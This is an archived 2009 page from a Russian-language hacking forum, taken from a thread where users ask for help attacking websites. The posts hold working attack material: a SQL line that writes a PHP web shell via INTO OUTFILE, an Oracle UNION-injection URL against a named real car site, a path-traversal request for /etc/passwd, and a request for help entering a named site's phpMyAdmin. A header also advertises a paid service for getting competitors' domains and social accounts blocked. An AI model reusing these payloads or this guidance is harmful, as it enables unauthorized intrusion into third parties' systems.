УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 447 из 1393

447

Опции темы

Поиск в этой теме

Опции просмотра

#4461

03.01.2009, 23:19

qazer

Участник форума

Регистрация: 26.11.2008

Сообщений: 167

Провел на форуме:
1025333

Репутация: 112

http://nismo.ru/phpmyadmin/tbl_create.php кто поможет зайти вот сюда?

#4462

04.01.2009, 00:05

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

Цитата:

Сообщение от sabe

подскажите как быть) как изменить тип

Нет скули, вообще

#4463

04.01.2009, 01:13

Octave_Parango

Познающий

Регистрация: 06.11.2008

Сообщений: 93

Провел на форуме:
349682

Репутация: 30

Приветствую.
Подскажите, можно ли залить шелл через phpMyAdmin?
Если сморозил глупость, sorry (:

#4464

04.01.2009, 01:52

Jokester

Members of Antichat - Level 5

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

Цитата:

Сообщение от Pashkela

Нет скули, вообще

Скуль есть.

sabe
Ты хочешь добится вывода? Ищи дркгой параметр, сдесь помоему глухо, похоже она слепая

Octave_Parango
SELECT '<?php system($c) ?>' FROM `table` INTO OUTFILE '/полный/путь/shell.php'

#4465

04.01.2009, 01:56

[Raz0r]

Members of Antichat - Level 5

Регистрация: 25.02.2007

Сообщений: 495

Провел на форуме:
3244717

Репутация: 1980

Отправить сообщение для [Raz0r] с помощью ICQ

Можно, при условии что у тебя есть доступ к выполнению произвольных SQL-команд и пользователь MySQL имеет привилегию FILE.
Вот статья по теме:
https://forum.antichat.ru/showthread.php?p=437118
Также в некоторых версиях phpMyAdmin есть уязвимости, с помощью которых можно залить шелл.
http://letmegooglethatforyou.com/?q=phpmyadmin%20exploit

__________________
<? Raz0r.name — блог о web-безопасности

#4466

04.01.2009, 02:04

ElteRUS

Постоянный

Регистрация: 11.10.2007

Сообщений: 406

Провел на форуме:
7215020

Репутация: 1423

sabe, это Oracle. Мне приходилось иметь дело с этой субд (в плане проведения инъекций) к сожалению безрезультатно (наверно я такой тупой). На античате есть статьи по сабжу

https://forum.antichat.ru/thread7157-%E8%ED%FA%E5%EA%F6%E8%FF+Oracle.html

https://forum.antichat.ru/thread7158-%E8%ED%FA%E5%EA%F6%E8%FF+Oracle.html

https://forum.antichat.ru/thread8009-%E8%ED%FA%E5%EA%F6%E8%FF+Oracle.html

Статьи на мой взгляд отвратительные. Вообще не читабельно (имхо). Еще есть мини статья от Подкащея вроде, но там все сбито в одну кучу. Просто так сказать некоторые особенности субд.

Желаю удачи

#4467

04.01.2009, 02:40

[Raz0r]

Members of Antichat - Level 5

Регистрация: 25.02.2007

Сообщений: 495

Провел на форуме:
3244717

Репутация: 1980

ElteRUS ты видимо не заметил отличную статью от [53x]Shadow по Oracle
http://forum.antichat.ru/showthread.php?t=40576

__________________
<? Raz0r.name — блог о web-безопасности

#4468

04.01.2009, 04:20

prescott

Участник форума

Регистрация: 28.07.2008

Сообщений: 158

Провел на форуме:
728470

Репутация: 115

Код:

http://lada-auto.ru/cgi-bin/models.pl?model_id=6295171+union+select+1,null,to_char(213),null+from+sys.dual--%20&branch=tth

Помогите с ORACLE инъекцией. Не могу подобрать тип данных для третьего столбца. В чем ошибка?

#4469

04.01.2009, 09:11

j0ker13

Участник форума

Регистрация: 28.07.2008

Сообщений: 199

Провел на форуме:
861008

Репутация: 58

при запросе index.php4?lang=1' выдает ошибку
Warning: main(lang/inc.lang1'.php): failed to open stream
при таком запросе index.php4?lang=/../../../../../../../../../../../../../etc/passwd%00 ошибка
Warning: main(lang/inc.lang/../../../../../../../../../../../../../etc/passwd
как я понял он не может найти папку inc.lang(( как правильно составить?))

#4470

04.01.2009, 10:01

o3,14um

Участник форума

Регистрация: 16.11.2006

Сообщений: 230

Провел на форуме:
599789

Репутация: 227

j0ker13. Такого файла нет, в НИКСах вылазит ошибка (может не во всех). Если бы была винда. то ты бы смог прочесть файл

Последний раз редактировалось o3,14um; 04.01.2009 в 10:04..

Страница 447 из 1393

447

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход